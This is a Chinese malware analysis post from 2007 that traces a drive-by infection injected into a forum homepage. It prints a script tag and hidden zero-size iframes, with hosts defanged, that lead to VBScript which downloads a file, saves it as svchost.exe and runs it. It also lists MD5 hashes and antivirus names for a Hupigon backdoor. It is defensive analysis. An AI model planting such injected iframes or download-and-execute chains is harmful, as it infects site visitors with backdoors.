endurer 原创

2007-01-31 第1

论坛首页包含代码:
/----
<script src="hxxp://www.4**884**6*6.com.**/AdOpen***.asp?Adid=41&MyUserID=dy16"></script>
----/
AdOpen***.asp 中包含代码:
/----
<IFRAME frameBorder=0 height=0 scrolling=no src=hxxp://www***1*.site**e***m.com/***19/0**7/tx**049326/other/wu.htm width=0></IFRAME>
----/
wu.htm 中包含代码:
/----
<iframe src="xskj.htm" width="0" height="0" border="0"></iframe>
----/

xskj.htm 中包含“Ja va script”脚本代码,功能是调用upescape()输出字符串。
输出字符串是中包含多余空格的VBScript脚本代码,功能是利用 Microsoft.XMLHTTP 和 scrīpting.FileSystemObject 下载文件 all.exe,保存为 %temp%/svchost.exe,然后调用自定义函数yunxingexe(m5,Xskj9)。
自定义函数yunxingexe()的功能是创建Shell.Application 对象XsKje,利用 XsKje 的 ShellExecute 方法 来运行 %temp%/svchost.exe。

/-----
文件说明符 : D:/test/all.exe
属性 : A---
语言 : 中文(中国)
文件版本 : 6.00.2900.2180 (xpsp_sp2_rtm.040803-2158)
说明 : Win32 Cabinet Self-Extractor                                          
版权 : (C) Microsoft Corporation. All rights reserved.
备注 :
产品版本 : 6.00.2900.2180
产品名称 : Microsoft(R) Windows(R) Operating System
公司名称 : Microsoft Corporation
合法商标 :
内部名称 : Wextract               
源文件名 : WEXTRACT.EXE           
创建时间 : 2007-1-31 14:46:56
修改时间 : 2007-1-31 14:46:56
访问时间 : 2007-1-31 14:47:48
大小 : 418304 字节 408.512 KB
MD5 : d5dad180f81f12a01ab2b35cc72a8ed7
-----/

原来是使用Windows自带的安装程序制作软件iexpress来打包。

其中包含2个文件:
1)0113.exe
是个WinRAR制作的自解压文件:
/------
;下面的注释包含自释放脚本命令
Path=c:/
Silent=1
Overwrite=1
------/
释放到c:/的 0113.exe 采用 UPX 0.89.6 - 1.02 / 1.05 - 1.24 -> Markus & Laszlo加壳。
/------
文件说明符 : D:/test/0113.exe
属性 : A---
获取文件版本信息大小失败!
创建时间 : 2007-1-14 17:48:12
修改时间 : 2007-1-31 15:6:57
访问时间 : 2007-1-31 15:8:35
大小 : 338944 字节 331.0 KB
MD5 : 818fefacaa3f7a2eafcfd2f0faa8acc3
------/
Kaspersky报为:Backdoor.Win32.Hupigon.czj
瑞星报为:Backdoor.Gpigeon.2006.bbe

2)kb.exe
采用GLBS Install Stub 32-bit -> Wise制作。
/------
文件说明符 : D:/test/kb.exe
属性 : A---
获取文件版本信息大小失败!
创建时间 : 2007-1-14 17:46:32
修改时间 : 2007-1-14 17:46:32
访问时间 : 2007-1-31 15:10:49
大小 : 8704 字节 8.512 KB
MD5 : 30916e8cca4b5afc05b41627de52e102
------/